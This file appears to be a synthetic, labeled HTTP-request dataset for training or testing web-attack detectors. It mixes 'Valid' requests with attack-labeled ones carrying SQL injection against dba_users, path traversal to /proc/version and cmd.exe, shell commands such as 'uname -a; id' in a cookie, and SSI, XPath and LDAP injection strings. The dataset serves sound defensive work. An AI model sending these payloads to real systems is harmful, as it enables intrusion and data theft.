Accept-Encoding: gzip;q=0.3, deflate, deflate, compress
Accept-Language: e2Ohu-7;q=0.6, E-tgTteeq;q=0.1
Cache-Control: l=u7ie
Client-ip: 249.184.252.20
Cookie: KNWGhTbv5Q=kdfao6oiatlg2etg;asaoeatvaeTnn7h=810;t6TwTxr=lsii;e8ccsuqL= os=
Cookie2: $Version="517"
Date: Tue, 16 Nov 04 07:11:01 GMT
ETag: W/"emH46gfHPSvicmXyRJ"
Expect: 100-continue
From: bcrhEeb@Zcto.com
If-Modified-Since: Mon, 21 Jul 08 08:35:57 CET
If-Unmodified-Since: Fri, 24 Dec 04 09:40:14 GMT
If-Match: *
If-None-Match: "SCzzi0jhYVrThPd6"
If-Range: Sat, 27 Jan 07 02:08:01 CET
Max-Forwards: 2266
MIME-Version: 6.3
Pragma: nhi=Wt70sv
Proxy-Authorization: Digest username="kJtoeurg"
Authorization: Digest algorithm=MD5-sess
Range: 877-
Referer: http://www.eauAlInt.net/nHimo/rhotcztb/etqy/tE39Rod.pdf
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.3 (compatible; n6thtrn; Open BSD i586; enzS; nooss)
UA-CPU: x86
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2533x094
Via: A8as/2.3 www.ne3lS.htm
Transfer-Encoding: gzip
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 151 146.124.39.49:89 "lAPnn" "Sat, 02 Jul 05 07:47:23 GMT"
X-Forwarded-For: 206.2.157.2
X-Serial-Number: 48113953855
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20540
Start - Id: 27265
class: Valid
GET /iCj7acvarWw1tDnull1/0bB/7yeallt6o4ol8eue/wzifhgkERejN2tdtih/iRgeip3sqrs/tnroshaht/zb3X@ja8W8/is0iewf/o0mT/encaeoZeh3lnawradt/tITiXf.css?redueimEsaItu=jFu5KQ0J&RTUzyc_kg=%7EnszlA7axl&0festte6nbs=6&ieaCynieoih8olr=nob8yhdgnaoeeh HTTP/1.0
Host: www.at8cdt.biz
Connection: Niweio
Accept: audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.4, compress;q=0.6, compress, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 163.125.16.115
Cookie: ncbKLuiMservices=aGD;Izxarnnoa6n6uet=Euj;ay6n=g$9B;bog=Sh$gtu<>u0ewhere;eessamCr(
Cookie2: $Version="931"
Date: Thu, 22 Oct 09 01:00:28 GMT
ETag: W/"@petwAC3XySRn6sQ"
Expect: 100-continue
From: x3Ito3ns@awokyi.net
If-Modified-Since: Sat, 15 May 04 24:49:51 UTC
If-Unmodified-Since: Mon, 11 Feb 08 15:46:03 GMT
If-Match: "6vfcp8dKybV0yzWi21"
If-None-Match: *
If-Range: Sun, 23 Mar 08 06:45:57 GMT
Max-Forwards: 5
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.yonersA.it/viliere/nase/ataasc/2ehf/a6te.js
Authorization: 6aen rmrhtlTa=aaouei
Range: -7
Referer: http://epine.cz/vn1aRs/hilelf/tyadrs.jsp
TE: gzip;q=0.0,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.4 (Machintosh; U; Mac OS X 9.5; ef-It; rv:2.2.2) Gecko/08417130
UA-CPU: 68000
UA-Disp: 4717,242,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8847x8709
Via: 9.0 244.195.73.89:726, aa8yix/8.5 www.uF5iNhdM.shtml
Transfer-Encoding: deflate
Upgrade: abeo/1.7, hNice/0.8, onao/1.2, i1n/2.5, rho/8.7
Warning: 401 www.sbfs.jpeg "cs4fiar" "Thu, 05 Jul 07 13:41:31 GMT"
X-Forwarded-For: 137.209.141.242
X-Serial-Number: 03585265611938930040
----: ----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27265
Start - Id: 48821
class: XPathInjection
GET /zXKrNcj4jbm/e5/tbier1/e2clod2stfneineu5I/eowsn7aeasegss/6H/o7J@GcO_LlYs5a/_winntB12050U/torerRaendt/eceosOemuidse.css?hie=67+++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++++018%3D&el=8505006&uepIt=et%7C&ib=9998209 HTTP/1.0
Host: 179.207.117.8
Connection: keep-alive
Accept: application/*;q=0.9, image/*
Accept-Charset: us-ascii;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 166.142.219.107
Cookie: ejimrmsrrtpa5ee=izH;ayiuqxt=4rd;oJU7t=533369;awbt=qhbP.vx.lg;NP0Hhscripto6U=wvllsrlix
Cookie2: $Version="4"
Date: Thu, 12 Apr 07 09:59:48 UTC
ETag: W/"HxRplA_cWdZdDiPv"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Wed, 01 Nov 06 21:58:03 GMT
If-Unmodified-Since: Sat, 03 Jan 09 04:44:01 CET
If-Match: "u8D4cxaE9W2nrt0eDye"
If-None-Match: *
If-Range: *
Max-Forwards: 0765
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: tCjw ehrbwm=shqlhtz
Authorization: lhqdie Nadc=a0Pic
Range: 5920-3
Referer: /faopHetr/metx/jzMt0l/ueiie/amle.txt
TE: trailers,chunked;q=0.7,chunked
Trailer: If-Match
User-Agent: epi3rpbze (hgy3hDlqV; n.ZsFgso; sOLyBz4ynW; tTuPC6TWb)
UA-CPU: MIPS
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: DgPrai/4.4
Warning: 902 221.77.27.240 "H6v5cts" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48821
Start - Id: 13579
class: Valid
GET /f9ZYnNNw4q2NOP/5X/sock_streami4telnetS3objectHBw/VGcmdJe0ZZHGu2Bwhere/bZ0@YXzKaaBfoC5.gif?mta3nV0stbl=thlohdeniwmlcTdfab&hrfhonoi3gn=3&ae=9&ryectsaloToe=056683298&xtmjpxucaeh=p&ilgheo5pehl=hH6one&iytb=eyUrl3V3leRees HTTP/1.1
Host: www.rqecavnhbf.com:80
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 134.203.218.183
Cookie: er4oaddtiLrr=ie7|;7tndqAZGfchaving1=rTcbfhqj3Trssece;erH7treftsn44s=2
Cookie2: $Version="131"
Date: Thu, 24 Nov 05 06:27:33 GMT
ETag: W/"IOnm0rkrBrMeR1LhDFG"
Expect: sp4siceo
From: 3y8ohDtm@Errta.cz
If-Modified-Since: Fri, 22 Jan 10 15:45:21 CET
If-Unmodified-Since: Sat, 31 Jan 04 05:26:58 UTC
If-Match: "NagQlEMmNb4lO9XOI89d"
If-None-Match: *
If-Range: "XRYFjnEtNV8MaQQXfzOo"
Max-Forwards: 56
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: Basic dGlPanVlYWY6YkkwbTFp
Range: 625-
Referer: http://www.hCce.ch/ho8aih/3ipdrht.fgf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: ndttknl2e/8.5.9
UA-CPU: Sparc
UA-Disp: 0610,0405,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x4900
Via: FTP/7.0 158.107.200.173, 1.3 www.eh00yf.css:885, 2.2 47.189.23.210
Transfer-Encoding: gzip
Upgrade: tsoo4A/5.4, a7l/6.5
Warning: 703 178.118.249.8 "oetetNse5t" "Tue, 31 Jan 06 07:52:19 UTC"
X-Forwarded-For: 43.218.172.178
X-Serial-Number: 70032554284651
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13579
Start - Id: 46399
class: PathTransversal
GET /Tc5Y/rK5pyWU3ewlE/ooslSk2F/ilaonthb0178ophji/xorlT9qSfx.css?ughetttpBaiae=2427594396&FxbRCG=smrKWn8&nY4aitxMp=wLir2&icqRi1yeROo=%2Fetc%2Fhttpd%2Fhttpd.conf&rshshd=hb%26c&ttkgenen=3050803&sqp6tn=oAtmhttps%3At-homeEixe&Mb4P2PAhttpsUX=kTdSr&aaiiaAsh=ao&xtermpassthruFoptreplacek2=trd%5C8h&ost=67873125&n5sTo8kEm=uHRphl%40acRWh HTTP/1.1
Host: 135.34.18.139
Connection: close
Accept: text/*;q=0.6, application/zip, video/*;q=0.6
Accept-Charset: euc-jp, us-ascii;q=0.5, utf-8;q=0.8, x-mac-chinesetrad;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: Wyw-frCtgty;q=0.4, pwTwi-wznkos;q=0.2
Cache-Control: l='t'
Client-ip: 43.64.25.189
Cookie: chefhUed=Ehs>5ui=net -sdachild6da;EuG=rlocationeN;eMXaso8lonq6sn=thrlah];OL;mEmawoN=zecoli;t
Cookie2: $Version="4"
Date: Fri, 05 Aug 05 21:53:33 GMT
ETag: W/"NmzUcd4Oc4.oiXZu9LS"
Expect: 100-continue
From: eitn@airwo.uk
If-Modified-Since: Mon, 09 Apr 07 20:44:21 UTC
If-Unmodified-Since: Fri, 17 Nov 06 24:21:57 GMT
If-Match: *
If-None-Match: "iysPBxTwY.87qTgwl.."
If-Range: *
Max-Forwards: 249
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest response="9eABA3a83fa522094D696FccACC995CA"
Range: 0-,-1441,-234089
Referer: /ylehs/celp/sas5/eerehf/oonu8.swf
TE: trailers
Trailer: TE
User-Agent: Mozilla/3.4 (compatible; MSIE 9.8; Linux i386; lpaohtleb)
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3216x516
Via: 4.4 www.Spyrs.css, HTTP/6.3 248.22.6.35, mn8ten/7.1 www.sfeea.html:056
Transfer-Encoding: compress
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 070 www.eidmeFjN.shtml "nisl" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46399
Start - Id: 42092
class: SqlInjection
GET /sqshapaatw7meansisp/nMhl2eez18eac7afh/tm_2xw2ySFEpUG/tL1XZd4/y3lo.dmQxconnectG/s7@/cWIHxatuVWCb5hZgXoBy.cgi?wpacUokcixP=693637&9VVBSw5Oinput=copen&mSzDipenwtlahht=mqe2e4&nl7e=chairs%27+++++UN%2F**%2FION++++SEL%2F**%2FECT++++Nhawhnp++++FROM+dba_users++++WHERE+tHlnfngu+++like++++%27%2525&aa2oqympeevnp1=7677759&utsei=4876&g3hGE=eFHFkvPMo-&mawp-B=92589079&pQVB=196282238 HTTP/1.0
Host: 16.203.243.4
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1257, x-mac-japanese, windows-874;q=0.7, iso-8859-8, utf-8;q=0.0
Accept-Encoding: 
Accept-Language: y0rln-tJaitno;q=0.8, asodwvdc-7u34;q=0.9
Cache-Control: no-store
Client-ip: 141.233.175.105
Cookie: ihgrHadeo=vdao9dnRli9;otrgrd=lMboot.ini;hkuoimU=3EFY_GeR;hqs=iaErp;iwdhfIae=08;eeNggepc=3265547
Cookie2: $Version="940"
Date: Fri, 08 Jan 10 24:33:50 UTC
ETag: "p2DgA9LRc_haRnet.oc"
Expect: bu7dtjr
From: LzmxnseS@evezd.fr
If-Modified-Since: Sun, 06 Mar 05 09:09:26 UTC
If-Unmodified-Since: Wed, 22 Apr 09 13:59:03 UTC
If-Match: "nrdPo4jc127AvK3Ap3c"
If-None-Match: *
If-Range: Tue, 13 Jun 06 21:44:13 UTC
Max-Forwards: 7895
MIME-Version: 0.9
Pragma: c6umIee='tccpa'
Proxy-Authorization: NTLM VGFlZHBlN3lzdDM4RWV0aWJsaGlhYWJoc2ZvdFd1aWVTZWxi
Authorization: Digest algorithm=roOs
Range: 106-1944,67279-,2-
Referer: /nenrrz.txt
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: c9nt/4.1.2
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 0.8 www.ltmd.shtml
Transfer-Encoding: 2sxz; visLEss=ztnhe2a4
Upgrade: z6NS/9.8, Brl/1.0, ets/2.0
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42092
Start - Id: 18059
class: Valid
GET /yVW/wu/nkHEHGH5TNLbgwAh48/oE/s3g6m/NAPvRq4g-/awW-YEk4g@RzwoEF1X.nsf? HTTP/1.0
Host: 197.114.11.67:86
Connection: close
Accept: text/xml, application/zip
Accept-Charset: macintosh;q=0.9, iso-2022-jp
Accept-Encoding: deflate, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 6.255.150.52
Cookie: 0aSopKZB=meh=;sityeLy2q=8eE;sa9to9iVitRtieo=rhcnelr5nie7a;OIxtermDiNo=0;7y=oe;se<e rm8et2hlNn
Cookie2: $Version="98"
Date: Fri, 30 Jul 04 03:52:31 GMT
ETag: "SiTkbb.5aR7i804En"
Expect: 100-continue
From: ubo9@noxriwRe.cz
If-Modified-Since: Thu, 25 Dec 08 11:19:12 UTC
If-Unmodified-Since: Wed, 24 Jun 09 14:08:22 UTC
If-Match: "Neyg2-t0-.kHSuV21"
If-None-Match: "cKy4_rCKIq6hsb0M."
If-Range: "J4JheqD3in-Znai8oAE"
Max-Forwards: 911
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: nagit ilrhne=uTamR
Authorization: NTLM aGVpcm9ucnRuNmlhZzNucnlkdG5mczlvdDR0d3J0ZWhxMHRldGdwdEVGb3Q=
Range: -498682,294755-,-12868
Referer: http://www.eUdsi.fr/hs3ct/denIcoti/seShc/drtw.tiff
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/0.5 (Windows; U; Win98 1.7; Da-Gs; rv:3.4.0) Gecko/71024412
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: 0.1 66.161.71.41, ikne/6.1 www.oNnT.png:3198
Transfer-Encoding: hpt5i
Upgrade: tdlvc/2.4, nwdaao/9.3
Warning: 781 78.175.59.108 "s0atoompRe" 
X-Forwarded-For: 169.12.78.179
X-Serial-Number: 77947378767
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18059
Start - Id: 3026
class: Valid
GET /pposition91flNN3Jdnph-43-/bh.cjmm2-/8rq1ufr8stoed5ho/UTUHLOJsamgnph-Zuw/bcyDYbeveYaittohaen/6iTfetazetaie/hoCO60@FTIXPmzaCjm/B9AoloEcTui3/rkzN3AtN/ridha/ofhprziititakeislre/elhhj.nsf?hltypnnmia5r=location%5D%3DerdslnOra1iros&tisl9eo=MiTad&kxtermPE3k9FVCH=tsneRhuifsN&Thtetshrwa2=r45A9JJ.XY8v HTTP/1.1
Host: 37.164.244.254:4
Connection: keep-alive
Accept: text/html;q=0.4, video/quicktime, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: id-ntem;q=0.1
Cache-Control: 4oxpapt=vErPhobt
Client-ip: 109.15.123.3
Cookie: 9ffonp7CeaOa=9;re=78229583;eneo6whee=91
Cookie2: $Version="42"
Date: Tue, 31 Jan 06 19:05:19 UTC
ETag: "qUHkNbL-yPO3IxUA"
Expect: 100-continue
From: Gnrp@qqtreOp.fr
If-Modified-Since: Mon, 04 Aug 08 09:29:29 UTC
If-Unmodified-Since: Sat, 08 Apr 06 17:15:49 GMT
If-Match: *
If-None-Match: *
If-Range: "tWQjB4W.A43eC9I"
Max-Forwards: 003
MIME-Version: 1.8
Pragma: nlr1A='lv9r78ts'
Proxy-Authorization: iaasI fdsn=2omiDleT
Authorization: oceiT llft=Woogge0
Range: 37991-,-13
Referer: /fSoefit/oith2rtr/nike2lr.jsp
TE: trailers
Trailer: Warning
User-Agent: mchee (ijm@J3-v; sXPc6gDa)
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 118x5064
Via: 8.1 www.mmes8S.jpeg, 0.2 www.dt9y1o.htm
Transfer-Encoding: compress
Upgrade: eyshdo/6.5, d0a/4.9, trpole/3.1, 9iyrb/0.5, o2zegv/7.8
Warning: 788 169.251.130.184 "eeko" 
X-Forwarded-For: 214.228.126.215
X-Serial-Number: 2317803874
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3026
Start - Id: 43957
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 214.21.1.129
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: hz-gb-2312, iso-10646-ucs-2, iso-10646-ucs-2;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: M-Alr, enoeoo-ybneo, g-neeaa;q=0.3, a8-o;q=0.6, jhr-lees
Cache-Control: no-cache
Client-ip: 167.244.39.243
Cookie: oisllntse=0;keryv6t=05091
Cookie2: $Version="40"
Date: Mon, 25 Oct 04 06:00:01 UTC
ETag: W/"g.zs56ap96bucj4wI"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Wed, 06 Jun 07 12:18:26 UTC
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: "ODgc4cyMJr@4jwx32IM"
If-None-Match: "4Ib8nR.KnYokT6Z@pfKr"
If-Range: Tue, 07 Oct 08 03:31:37 GMT
Max-Forwards: 85
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: Digest realm
Range: 97793-3,500796-0
Referer: http://www.sottnsut.uk/sroMled/llnvibfi.msf
TE: trailers,trailers
Trailer: Via
User-Agent: aaidwhaNaao
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4200x926
Via: FTP/8.0 108.237.253.181:89, HTTP/4.4 209.128.105.216
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 43957
Start - Id: 37103
class: LdapInjection
GET /XXyAL6X/sQQkLDxj-7Ss/mKb5y_xDwURAFpZ-DXnI/dgtjC5dXOm2OWb3/erHo5Ba/yNimdatIns.css?fmmreagr=lwjityl&otr=cn70deseh&ee51dzTaonmtEt=%29++%28++%7C++++%28cu%3Dmz7e*%29 HTTP/1.0
Host: www.sntdlu0D.org
Connection: ihnr8ta
Accept: application/zip;q=0.5
Accept-Charset: iso-8859-3;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=958
Client-ip: 236.39.89.101
Cookie: dojtrcu=/$a+~phtpasslog;t+i4zadmin/catqn;bnsa7maahelea=smeso;nushRiUejnsor1h=ern;wdevk0ecneidn=rRA_Jq;xvxo3hehsoNoI0n=0944143630;h1=o0YbDTdejsx
Cookie2: $Version="020"
Date: Tue, 21 Feb 06 21:02:20 UTC
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: idorit=hhox;9ha3ae=2Vh6e
From: 5cih8hH@th6En.it
If-Modified-Since: Thu, 19 Jul 07 02:03:03 GMT
If-Unmodified-Since: Sat, 20 Jan 07 11:49:50 GMT
If-Match: "@0sTaB9Jcv1mpZiO"
If-None-Match: *
If-Range: Sun, 09 Jul 06 21:13:59 GMT
Max-Forwards: 64
MIME-Version: 4.7
Pragma: ojrit=ntlh
Proxy-Authorization: Basic ZGk5b2g6bmZpcmU3
Authorization: maessy sOhmS=idhnenqn
Range: 3-,0-
Referer: http://www.5seo6ie.net/oleeH/0euh/nefte.exe
TE: chunked,gzip;q=0.2
Trailer: Via
User-Agent: intrdgdlAaioa7hn
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 617x3755
Via: 0.2 78.182.206.160:8235, 8.7 www.cban.html:72909, 7.8 149.36.247.45
Transfer-Encoding: 6mna
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 330 www.aiew2aRa.jpg "huTweibwmAEeQpte" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37103
Start - Id: 36682
class: OsCommanding
GET /home03/nRr9mDModLVU5BjHi7/1k/fihecircoonmbnaue/ystdino5oF3zAQacceptt/aJcrvbUiaYtR/p7gykBh6g51reUOpH/ftCn/eHRMbX@a42iaAluZ5/3ltaoeeFAnxDf7l.nsf? HTTP/1.1
Host: www.sdvsD.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: icroh5t-xsef;q=0.7, n-objid;q=0.5, Rhi0nhcr-e, 6t-le;q=0.1, eyadrne-hrds8lR6;q=0.2
Cache-Control: max-stale
Cookie: afttncodaglshr=572;ihcso=9792;dolonxsts7=; echo    ;     w  ;  uname   -a ;    id;xSmUiframeHosamN2=6g-W5;m2hyEvean=0097;atnuoeLpcalbdi=nssw
Cookie2: $Version="82"
Date: Fri, 24 Aug 07 10:39:46 UTC
ETag: "wy@OzR52T2wQnQtS"
Expect: 100-continue
From: lilt@OlQ9nomrvy.gov
If-Match: *
If-None-Match: *
If-Range: Tue, 23 Mar 10 15:38:48 UTC
Max-Forwards: 2337
Authorization: Digest nc=fd1AFac9
Range: 54-9,-814311,72-
Referer: http://www.rmnyyfs.gov/rnZjuT/adEco59l/doare/deFeeh5.swf
User-Agent: enmstore/7.2.5.3
UA-Disp: 6716,830,16
Transfer-Encoding: utmate; sdee6=DtnlyOam
Warning: 690 185.253.94.244 "Garhr" "Tue, 09 Jan 07 24:46:57 UTC"
X-Forwarded-For: 4.27.255.43
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36682
Start - Id: 40613
class: SSI
GET /ys3NyhVDu/jm/2h.html?kmkcionn=%3C%21--+%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&hcrnieldus=299458&kscoEUlydnaB=8 HTTP/1.0
Host: www.ntiseeu.com:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, gzip;q=0.5, compress;q=0.8
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 93.243.241.46
Cookie: ndbix=8610;bRqWKFxFSRED=lLns9c;atOwee=eh;aeoeionmq=nX9;raNrrofd5=onneE
Cookie2: $Version="252"
Date: Mon, 16 Nov 09 09:38:15 GMT
ETag: W/"XWRHMD7oM416.PP_iF5_"
Expect: 100-continue
From: mObarai@oDeniipebe.it
If-Modified-Since: Wed, 19 Apr 06 04:37:00 CET
If-Unmodified-Since: Sat, 17 Sep 05 24:23:05 CET
If-Match: *
If-None-Match: "2dT5D-vtaabb8Qb@FHrd"
If-Range: *
Max-Forwards: 34
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: NTLM c29ZbHRmc2poZ3RadG5ocG5jb2Nuc3RpaXJMRW9hdGM=
Authorization: Digest username="ednha"
Range: -916,8-,-198241
Referer: /6mcos/bi39F/eBmm/cei4ast.php4
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.5 (Windows; U; WinNT 3.3; Oa-ar; rv:4.4.4) Gecko/86395641
UA-CPU: PowerPC
UA-Disp: 116,2183,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 367x571
Via: FTP/7.5 www.rsi3t.jpg:8970, 2.0 www.12sfo.jpeg:0
Transfer-Encoding: asea
Upgrade: aen/7.4, rd7in/6.7
Warning: 304 www.eueCo.tiff:16 "IcolrcmeCtIstSoht5ne" "Sat, 07 Jul 07 14:18:42 CET"
X-Forwarded-For: 5.3.246.86
X-Serial-Number: 0848613920149750
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40613
Start - Id: 46202
class: PathTransversal
GET /klt4VQEJ8DEKaWY4MKr/RX/ri/kVHIX7I/DRvZCRYH6/x0Dz1homexmlhi@iUxeT/d7Zs/lWm8ieEa.nsf?4adhchtda4c=os%3Bt&qDo0H8y=th7sa&l0ceo=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion HTTP/1.0
Host: 21.76.145.222
Connection: keep-alive
Accept: video/*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: sbTem-intE, ett-t;q=0.7
Cache-Control: min-fresh=295
Client-ip: 116.139.98.213
Cookie: mt=o-CCCjTzUG;sqorbe9nv=d(>unionboot.ini;bgaj=869486
Cookie2: $Version="43"
Date: Thu, 01 Nov 07 15:50:04 CET
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Sat, 02 Feb 08 01:40:20 UTC
If-Unmodified-Since: Fri, 20 Feb 09 21:16:22 UTC
If-Match: *
If-None-Match: "EeC9TmUiC5mCDt36AMO"
If-Range: "tO0c.-vsS2DGOFfZ"
Max-Forwards: 13
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Basic bGFlbWU6NXhkeXA=
Range: 684-,-674552,060-
Referer: http://a8elom.com/3ltiaoo/iret/ltee/pisotr.pdf
TE: gzip,trailers
Trailer: Accept
User-Agent: eoj6eHC6e1saareVeV
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 231.32.166.77, 1.9 17.12.20.169
Transfer-Encoding: identity
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 03479803459
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46202
Start - Id: 16828
class: Valid
GET /dwogotgletnlyte/eRN1_C/pdArstEzoEotrvhac.asp?ro=qht&OopenEFfaccept=iY4Kt&d4iopaFTf=74&mtsterJ=ttriN&nln=gz%3Dscript&d6s3av1jeoirdtE=cxm2seoye&mnltileenyuhao=%26%3AejhyrO&yha6=sk%28Ui HTTP/1.1
Host: 31.68.243.143
Connection: close
Accept: text/xml, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=374
Client-ip: 6.186.207.70
Cookie: ioecsd=dta;0yt=0281;ie=a;eru2ckyttntn4st=ucsO_Uwx;hnu=bi4tudfekl9t;having_R2D0dN=6228
Cookie2: $Version="7"
Date: Thu, 01 Sep 05 10:14:48 GMT
ETag: "itjXOwKf@iA@iiML87g"
Expect: 100-continue
From: sLreap3i@a64Yedt.be
If-Modified-Since: Thu, 12 Apr 07 18:36:13 CET
If-Unmodified-Since: Fri, 30 May 08 05:02:35 GMT
If-Match: *
If-None-Match: "Rv9RXRDpttAjaUwk"
If-Range: *
Max-Forwards: 8806
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest username="lfoxlnn"
Authorization: paeE itvnx=iira4Nt
Range: 9-87181
Referer: /hhda/5IeteiTu.css
TE: deflate;q=0.7
Trailer: If-Range
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 8.6; oa-1o; rv:1.8.7) Gecko/80973173
UA-CPU: StrongARM
UA-Disp: 952,004,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 818x5345
Via: HTTP/0.2 www.tmesb.js
Transfer-Encoding: n5Te; fijOqqai=Qd4ufGr
Upgrade: lenv/1.1, ndi/4.7
Warning: 045 www.on6iee.shtml "rinmaEtgssGotet" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 60090044663
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16828
Start - Id: 16133
class: Valid
GET /gmS4nbiztrp/3aenjeoNswar/Gall/su-FhV_Kkz/yDMG./rgoaolooyegltettoen/Wcre/7eeiovmaemuge/LB/nTEp.jpeg?NoQP=231&5ph6EoOq=39&lwro5hepitnr=5483878&SwelgiHIsn23Df=760007 HTTP/1.0
Host: www.tcnriw.st:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1250;q=0.7, x-mac-chinesesimp;q=0.7, cp-950
Accept-Encoding: *;q=0.9
